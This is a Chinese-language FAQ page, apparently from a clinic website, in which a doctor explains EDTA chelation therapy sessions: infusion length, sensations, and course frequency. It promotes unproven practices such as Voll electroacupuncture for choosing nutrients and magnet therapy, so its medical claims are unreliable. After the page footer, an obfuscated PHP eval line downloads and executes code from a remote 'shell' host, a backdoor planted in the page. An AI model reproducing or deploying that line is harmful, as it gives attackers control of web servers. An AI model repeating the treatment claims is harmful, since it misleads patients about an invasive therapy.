Add Site to Favorites
首頁 arrow 來信答覆 arrow 螯療 Q&Aarrow 螯合療法需要多久的時間?它會讓我有痛感或其他感覺嗎?
螯合療法需要多久的時間?它會讓我有痛感或其他感覺嗎?
Print 
Written by 劉大元 醫師
Tuesday, 17 February 2009


忙中偷閒體驗身體變化


進行螯合療法之前,你最好將手邊的事情暫時告一段落,因為我們希望每一位接受螯合治療的人,

能在安心且舒適的狀態下去感覺和體會身體的變化。


依據每個患者的不同,

我們先用傅爾電針篩選出適合且足量的維他命、礦物質、胺基酸、抗氧化劑 、 微量元素…

加入EDTA的注射液中,而後按照一般的靜脈注射程序進行。

因為所給予的營養素是足夠的,所以對有些患者而言,

偶爾會有頭脹、頭暈的感覺,注射部位有時會有刺痛感

有些人偶爾會有噁心的感覺,但這都可以很快的運用醫學芳療、磁療….等方法消除這些不適。

正常情況下,單次約二百~三百CC的注射液,

以三至四秒一滴的速度,約需三~四小時的時間來完成。

這段時間,只要不影響點滴進行的情況下,

你可以隨意的躺著休息、和朋友聊天,斜倚著看電視、看書、打毛衣,甚 至是輕鬆地喝下午茶

如果事務繁忙、不得閒的話,你還是可以進行打電話或處理公務等靜態的活動。

用主流醫學檢查客觀印證
 
多數人在注射完 EDTA 之後,會立即感覺到精神變好,

那是因為 EDTA 裡加入了身體所需的足量維他命與礦物質、 胺基酸、抗氧化劑、微量元素…

體內細胞吸取充足的 養份後,自然顯得「活力旺盛」。

少數人在頭幾次的螯合治療後會有一些疲倦感,因為身體正在做修復的工作,

這時最好順著身體所發出的訊息補足睡眠

通常第二天就會恢復正常,不必太過於擔心。

全世界有關螯合療法的規範 ,是由 Interational  Board of  Chealtion  Therapy(IBCT)

以及 American  Board  of Chealtion Therapy(ABCT)

這兩個國際組織所訂定的,但我們依照東方人與西方人不同的體質,做了一些必要的修正。

對於已有症狀的患者,建議每週進行一~二次的螯合療法。

我們將二十次設定為一個療程,需要幾次或幾個療程?

端視疾病嚴重的程度而定;大部份的人在幾次治療後,就會明顯感到自己身體有顯著的進步。

而我們鼓勵病患透過主流醫學的各項檢測,更客觀地證實這些進步。

若為預防治療,也需要依照個別身心狀況來決定治療的次數。


Last Updated Monday, 28 June 2010
Tags
95,00% of 20 voters found this FAQ useful,  I found this FAQ  useful useful  not useful not useful
< Prev   Next >

Powered by EasyFAQ © 2006 Joomla-addons.org
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));